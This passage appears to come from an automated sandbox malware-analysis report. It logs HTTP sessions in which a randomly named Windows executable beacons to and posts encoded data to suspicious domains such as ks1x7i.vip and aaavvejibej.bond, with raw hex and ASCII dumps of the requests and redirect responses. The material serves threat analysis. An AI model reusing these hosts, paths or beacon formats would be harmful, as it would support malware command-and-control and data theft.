                                                                                                                                                        Dec 5, 2024 05:39:17.603600025 CET551OUTGET /aj1a/?ZrE=Ur0ZWyFT8OiEfJLk5CDxNCd7dngJ/nUOC6gmTkbLwRlGrqwEpeuL3mntSz3wGsXywBh/uITd5DD6tXUqWwiKdOlO+GKC/0z5L+tJCqOb0hSd3y/0vLqXRKaQtaaTWzJkNrBKAAI=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.ortenckt.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:39:18.701617002 CET406INHTTP/1.1 200 OK
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:18 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 266
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 72 45 3d 55 72 30 5a 57 79 46 54 38 4f 69 45 66 4a 4c 6b 35 43 44 78 4e 43 64 37 64 6e 67 4a 2f 6e 55 4f 43 36 67 6d 54 6b 62 4c 77 52 6c 47 72 71 77 45 70 65 75 4c 33 6d 6e 74 53 7a 33 77 47 73 58 79 77 42 68 2f 75 49 54 64 35 44 44 36 74 58 55 71 57 77 69 4b 64 4f 6c 4f 2b 47 4b 43 2f 30 7a 35 4c 2b 74 4a 43 71 4f 62 30 68 53 64 33 79 2f 30 76 4c 71 58 52 4b 61 51 74 61 61 54 57 7a 4a 6b 4e 72 42 4b 41 41 49 3d 26 4a 72 3d 74 6e 61 78 78 74 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZrE=Ur0ZWyFT8OiEfJLk5CDxNCd7dngJ/nUOC6gmTkbLwRlGrqwEpeuL3mntSz3wGsXywBh/uITd5DD6tXUqWwiKdOlO+GKC/0z5L+tJCqOb0hSd3y/0vLqXRKaQtaaTWzJkNrBKAAI=&Jr=tnaxxtx"}</script></head></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.6499033.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:24.369544029 CET803OUTPOST /dlcs/ HTTP/1.1
                                                                                                                                                        Host: www.ks1x7i.vip
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ks1x7i.vip
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ks1x7i.vip/dlcs/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 39 34 34 43 44 6f 66 2b 4b 41 72 4d 35 70 4c 54 43 47 34 34 76 67 72 6f 54 6e 47 2f 75 4d 62 6e 70 70 51 48 74 55 49 32 64 68 65 49 57 4d 7a 2f 4f 49 30 68 64 2b 4e 53 4f 75 65 74 6e 79 77 38 69 4f 6e 4e 6a 65 51 38 55 71 52 54 7a 31 62 7a 2b 33 2b 43 50 76 49 76 36 31 52 2b 67 39 75 71 38 63 62 64 46 2b 2f 77 46 75 59 2b 2b 79 2b 37 48 4b 47 71 4c 78 62 2b 6f 4e 48 37 33 33 78 65 57 66 78 64 73 39 53 57 67 57 54 36 35 6b 4d 44 36 77 4c 38 30 76 50 39 39 53 55 70 6c 36 58 62 74 36 66 52 2b 2f 53 76 5a 6a 66 68 68 65 4c 56 5a 4d 51 42 41 59 54 52 39 74 36 4c 71 47 61 31 66 4b 6e 4b 76 51 51 6e 72 62 4e 42
                                                                                                                                                        Data Ascii: ZrE=944CDof+KArM5pLTCG44vgroTnG/uMbnppQHtUI2dheIWMz/OI0hd+NSOuetnyw8iOnNjeQ8UqRTz1bz+3+CPvIv61R+g9uq8cbdF+/wFuY++y+7HKGqLxb+oNH733xeWfxds9SWgWT65kMD6wL80vP99SUpl6Xbt6fR+/SvZjfhheLVZMQBAYTR9t6LqGa1fKnKvQQnrbNB


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.6499103.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:27.028373003 CET827OUTPOST /dlcs/ HTTP/1.1
                                                                                                                                                        Host: www.ks1x7i.vip
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ks1x7i.vip
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ks1x7i.vip/dlcs/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 39 34 34 43 44 6f 66 2b 4b 41 72 4d 36 49 37 54 4f 46 41 34 74 41 72 72 63 48 47 2f 6c 73 62 5a 70 70 63 48 74 56 4d 6d 64 53 32 49 52 73 44 2f 50 4d 41 68 51 65 4e 53 42 4f 65 53 71 53 77 33 69 4f 72 76 6a 66 73 38 55 71 46 54 7a 77 6e 7a 2b 41 4b 46 4d 66 49 74 79 56 52 67 2f 74 75 71 38 63 62 64 46 2b 36 74 46 75 67 2b 2b 69 69 37 56 37 47 70 43 52 62 2f 38 64 48 37 7a 33 77 56 57 66 78 72 73 35 79 6f 67 56 72 36 35 6c 51 44 39 69 6a 39 2f 76 4f 32 7a 79 56 4c 68 35 69 52 73 70 69 4f 2f 39 2b 66 50 6a 62 65 6b 6f 4b 50 46 2f 51 69 53 49 7a 54 39 76 69 35 71 6d 61 66 64 4b 66 4b 39 48 63 41 6b 76 6f 69 66 7a 70 70 2f 42 64 2f 41 50 63 74 31 75 35 5a 67 4d 73 2f 67 67 3d 3d
                                                                                                                                                        Data Ascii: ZrE=944CDof+KArM6I7TOFA4tArrcHG/lsbZppcHtVMmdS2IRsD/PMAhQeNSBOeSqSw3iOrvjfs8UqFTzwnz+AKFMfItyVRg/tuq8cbdF+6tFug++ii7V7GpCRb/8dH7z3wVWfxrs5yogVr65lQD9ij9/vO2zyVLh5iRspiO/9+fPjbekoKPF/QiSIzT9vi5qmafdKfK9HcAkvoifzpp/Bd/APct1u5ZgMs/gg==


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.6499173.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:29.685472965 CET1840OUTPOST /dlcs/ HTTP/1.1
                                                                                                                                                        Host: www.ks1x7i.vip
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ks1x7i.vip
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ks1x7i.vip/dlcs/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 39 34 34 43 44 6f 66 2b 4b 41 72 4d 36 49 37 54 4f 46 41 34 74 41 72 72 63 48 47 2f 6c 73 62 5a 70 70 63 48 74 56 4d 6d 64 55 75 49 52 64 6a 2f 50 74 41 68 52 65 4e 53 4d 75 65 54 71 53 77 75 69 4f 6a 72 6a 66 68 48 55 70 39 54 79 56 72 7a 34 78 4b 46 58 76 49 74 77 56 52 68 67 39 75 46 38 64 72 5a 46 39 53 74 46 75 67 2b 2b 67 57 37 43 36 47 70 4f 78 62 2b 6f 4e 47 30 33 33 78 79 57 63 42 37 73 35 33 54 6a 6c 4c 36 2b 46 41 44 2f 52 4c 39 38 50 4f 30 77 79 56 74 68 35 2b 53 73 70 2b 43 2f 39 6e 58 50 6b 54 65 6b 75 72 50 64 76 45 6e 41 4f 79 2f 38 4e 76 64 68 78 53 4e 55 70 61 36 31 30 73 43 76 66 6b 55 53 6d 56 4b 36 43 34 66 57 35 6b 44 7a 37 35 49 73 76 4a 7a 79 49 7a 74 36 63 33 33 42 74 6f 37 4e 55 63 6e 6a 41 51 6e 4d 49 4f 7a 59 73 6f 2b 61 48 58 71 79 2f 39 4f 55 4e 45 31 35 4b 6c 57 35 67 5a 74 77 6e 68 67 4d 64 4b 50 5a 41 4a 44 78 6c 45 47 72 56 42 68 56 42 43 67 7a 49 39 65 47 69 52 39 54 73 31 44 44 55 74 6b 6b 52 66 44 6a 57 31 36 2f 6e 66 4c 6c 58 2b 5a 73 6e 6c 79 75 4a [TRUNCATED]
                                                                                                                                                        Data Ascii: ZrE=944CDof+KArM6I7TOFA4tArrcHG/lsbZppcHtVMmdUuIRdj/PtAhReNSMueTqSwuiOjrjfhHUp9TyVrz4xKFXvItwVRhg9uF8drZF9StFug++gW7C6GpOxb+oNG033xyWcB7s53TjlL6+FAD/RL98PO0wyVth5+Ssp+C/9nXPkTekurPdvEnAOy/8NvdhxSNUpa610sCvfkUSmVK6C4fW5kDz75IsvJzyIzt6c33Bto7NUcnjAQnMIOzYso+aHXqy/9OUNE15KlW5gZtwnhgMdKPZAJDxlEGrVBhVBCgzI9eGiR9Ts1DDUtkkRfDjW16/nfLlX+ZsnlyuJBU4tM56FgXEWk9g3ARk1xoN4xQ0PYizM1XT1a5spxrghKCv62YROK7HAJKVWmk3Z1tBYdEQHp5E5FmpkQfRfKZ+zsFExamhwWo6W024wgNSixp5Rdcpj6Ew4s+I90BuT/uaKR6bZnmPIqUK9RgTL3/vQjFR4Yy2HCzWBAU9UJsqkGSLIoxZ6W0G8ZdUmQ+D/GC3hsaYU5eoWGJvN768z4O8D7J6xRABz4WQTxh6dzkFDAtd80H3deV/du2E8aeId0FbA4z6UY+4+gQr3JdZSgAbgJj5w8fnE+ycuJFRqzQV3qIqO+DrPdmyrwzEPbCJRCl4CsjZp1ablFhiUXU6nkrucJaxfXsZlPRyZ3mCUf4XK0Vwcb5xxy35aH/5eTZNdlR0AskTqGiTgu2Md4RwcNWOwAtMsoX+6kamCCsaFz7tSscIgEnFX1nOJY5Ld8NxfsmtX3nv8P9fHTlP/Oxk0NAUo8zVS20MGwdqGi7/fQyxhSjQcxSTt6n8xiNRwXfLy5zJG7++JKPHdDZMSA/X8p65DPCjZiL70GlI1+UvZd3jVoOF8E/y39+7/O8sy6VUEvzylUMrKgKKkilme3Ru6yWs1CB5I2YffVBTAAskMXtyKiIrnuRmEiSsYrOIoCMXeGTF161z+Vff0xWNh7DhThKCJhG9Z1SDhOM [TRUNCATED]


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.6499233.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:32.336359978 CET546OUTGET /dlcs/?ZrE=w6QiAdP8awPLsa7eBVc39wzje3KOivPaseEO6V4cXiHKOPXUCZsKQLVdGPqPnVEzm93wkYEJdOAjyg/exCmJYaQq4xVLxeGT88y8VuPgcLQNhWCgEoW6IBmijKvaz1FJHcFNtNE=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.ks1x7i.vip
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:39:33.432655096 CET406INHTTP/1.1 200 OK
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:33 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 266
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 72 45 3d 77 36 51 69 41 64 50 38 61 77 50 4c 73 61 37 65 42 56 63 33 39 77 7a 6a 65 33 4b 4f 69 76 50 61 73 65 45 4f 36 56 34 63 58 69 48 4b 4f 50 58 55 43 5a 73 4b 51 4c 56 64 47 50 71 50 6e 56 45 7a 6d 39 33 77 6b 59 45 4a 64 4f 41 6a 79 67 2f 65 78 43 6d 4a 59 61 51 71 34 78 56 4c 78 65 47 54 38 38 79 38 56 75 50 67 63 4c 51 4e 68 57 43 67 45 6f 57 36 49 42 6d 69 6a 4b 76 61 7a 31 46 4a 48 63 46 4e 74 4e 45 3d 26 4a 72 3d 74 6e 61 78 78 74 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZrE=w6QiAdP8awPLsa7eBVc39wzje3KOivPaseEO6V4cXiHKOPXUCZsKQLVdGPqPnVEzm93wkYEJdOAjyg/exCmJYaQq4xVLxeGT88y8VuPgcLQNhWCgEoW6IBmijKvaz1FJHcFNtNE=&Jr=tnaxxtx"}</script></head></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        11192.168.2.649940104.21.31.249803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:38.892378092 CET821OUTPOST /j82t/ HTTP/1.1
                                                                                                                                                        Host: www.aaavvejibej.bond
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.aaavvejibej.bond
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.aaavvejibej.bond/j82t/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 41 64 2b 33 41 53 73 72 79 75 6d 74 68 6c 4b 41 4e 31 49 5a 4c 47 48 70 6e 6d 4a 78 62 6c 63 35 61 49 7a 79 61 5a 63 48 59 47 74 33 54 58 6e 51 42 75 54 37 48 31 79 6e 4d 2b 74 37 49 34 78 4d 65 69 6a 54 4e 67 56 68 51 37 46 49 44 34 7a 4a 7a 4e 38 32 77 66 6c 67 30 38 61 68 57 62 4f 44 62 2b 31 69 62 41 57 33 38 58 6d 2f 52 2f 67 37 4b 76 6d 54 78 45 65 31 43 78 39 52 30 77 4f 6a 44 2f 36 78 79 45 38 42 65 38 39 57 49 35 78 37 43 70 4b 72 6b 6a 30 72 46 38 76 4d 4d 37 77 2f 39 58 6e 51 37 4d 54 70 55 38 33 53 6e 61 6a 6f 4b 42 48 69 48 77 34 73 43 56 75 75 59 48 72 72 67 46 6c 38 4e 46 32 57 42 4d 47 34
                                                                                                                                                        Data Ascii: ZrE=Ad+3ASsryumthlKAN1IZLGHpnmJxblc5aIzyaZcHYGt3TXnQBuT7H1ynM+t7I4xMeijTNgVhQ7FID4zJzN82wflg08ahWbODb+1ibAW38Xm/R/g7KvmTxEe1Cx9R0wOjD/6xyE8Be89WI5x7CpKrkj0rF8vMM7w/9XnQ7MTpU83SnajoKBHiHw4sCVuuYHrrgFl8NF2WBMG4
                                                                                                                                                        Dec 5, 2024 05:39:40.435516119 CET782INHTTP/1.1 400 Bad Request
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:40 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXM4IkSArbVlxTLCNtq5tB56Ve0VaBKfnNSWWlhf0%2FpNZJr2IHo0RnvshSW4bCjGipBe2qBbKC29QXa6odrrn4WDM69W0b66D%2BINpVhl%2BPgNwEFEZH6XRSZVJ370Hk24d%2BV31b%2BEgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8ed15a89de6f0fa8-EWR
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1542&rtt_var=771&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=821&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                        Data Raw: 33 0d 0a 34 30 34 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 34040


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        12192.168.2.649947104.21.31.249803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:41.541641951 CET845OUTPOST /j82t/ HTTP/1.1
                                                                                                                                                        Host: www.aaavvejibej.bond
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.aaavvejibej.bond
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.aaavvejibej.bond/j82t/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 41 64 2b 33 41 53 73 72 79 75 6d 74 67 45 36 41 4c 55 49 5a 4b 6d 48 6f 72 47 4a 78 51 46 64 52 61 49 50 79 61 64 73 58 5a 79 42 33 54 79 6a 51 41 71 2f 37 41 31 79 6e 55 4f 74 2b 46 59 78 48 65 69 65 75 4e 69 78 68 51 37 68 49 44 34 44 4a 79 36 51 31 78 50 6c 69 74 73 61 6a 59 37 4f 44 62 2b 31 69 62 41 43 4f 38 58 75 2f 52 50 38 37 4e 39 4f 63 75 30 65 30 56 42 39 52 6c 41 4f 76 44 2f 37 53 79 46 52 75 65 2f 46 57 49 37 5a 37 43 34 4b 71 71 6a 30 78 49 63 75 4f 4e 71 74 61 7a 57 6d 41 36 73 37 70 41 62 50 76 72 4d 69 79 57 79 48 42 56 67 59 75 43 58 32 63 59 6e 72 42 69 46 64 38 66 53 36 78 4f 34 6a 62 5a 72 54 42 67 52 31 2b 4f 46 36 39 6a 4d 2f 73 54 69 59 49 58 67 3d 3d
                                                                                                                                                        Data Ascii: ZrE=Ad+3ASsryumtgE6ALUIZKmHorGJxQFdRaIPyadsXZyB3TyjQAq/7A1ynUOt+FYxHeieuNixhQ7hID4DJy6Q1xPlitsajY7ODb+1ibACO8Xu/RP87N9Ocu0e0VB9RlAOvD/7SyFRue/FWI7Z7C4Kqqj0xIcuONqtazWmA6s7pAbPvrMiyWyHBVgYuCX2cYnrBiFd8fS6xO4jbZrTBgR1+OF69jM/sTiYIXg==
                                                                                                                                                        Dec 5, 2024 05:39:43.087548018 CET780INHTTP/1.1 400 Bad Request
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:42 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5aRWO3lyegZHnrVPSHS2Ht4PApE138vIrU3wpUkz%2BS7V%2FYzAUo4Tp9w3VkjqK21sxqV83AwOWxlSWSYvUSNGjZiV6zoSpDMrdgIseKS%2BTMsK3D5zdj1AZQW6W0213hzEq7%2FvZ6X5gw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8ed15a9a6c1242bc-EWR
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1596&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=845&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                        Data Raw: 33 0d 0a 34 30 34 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 34040


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        13192.168.2.649955104.21.31.249803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:44.201124907 CET1858OUTPOST /j82t/ HTTP/1.1
                                                                                                                                                        Host: www.aaavvejibej.bond
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.aaavvejibej.bond
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.aaavvejibej.bond/j82t/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 41 64 2b 33 41 53 73 72 79 75 6d 74 67 45 36 41 4c 55 49 5a 4b 6d 48 6f 72 47 4a 78 51 46 64 52 61 49 50 79 61 64 73 58 5a 7a 56 33 51 45 66 51 50 72 2f 37 42 31 79 6e 64 75 74 46 46 59 78 61 65 69 33 6c 4e 69 39 78 51 35 70 49 42 5a 6a 4a 36 6f 6f 31 34 50 6c 69 69 4d 61 69 57 62 50 44 62 36 5a 6d 62 41 53 4f 38 58 75 2f 52 4f 4d 37 65 50 6d 63 39 6b 65 31 43 78 39 46 30 77 4f 44 44 2f 69 70 79 46 55 52 65 4f 6c 57 4c 62 4a 37 52 36 79 71 6d 6a 30 33 4c 63 75 73 4e 71 68 4a 7a 57 36 4d 36 73 2b 4d 41 63 2f 76 70 64 61 72 47 78 33 46 4f 43 6f 53 5a 6c 65 48 41 77 37 33 69 58 52 73 58 43 71 6b 48 35 53 31 41 65 58 71 74 69 56 6a 4d 56 61 51 71 72 47 34 52 53 31 48 46 34 4f 2f 4e 48 66 4e 54 72 5a 6b 63 6e 6e 48 54 51 45 4b 37 79 5a 7a 53 2b 44 67 71 4a 45 4c 39 2f 31 6a 2f 32 67 4d 36 63 34 78 54 31 6c 67 58 46 56 7a 58 69 2f 5a 58 30 59 73 62 37 58 4d 2f 65 50 54 52 69 43 41 53 77 66 2f 6c 69 43 36 61 46 33 5a 47 74 56 50 67 45 77 4b 36 55 52 32 71 31 65 71 4b 4b 47 2f 34 32 48 48 74 52 [TRUNCATED]
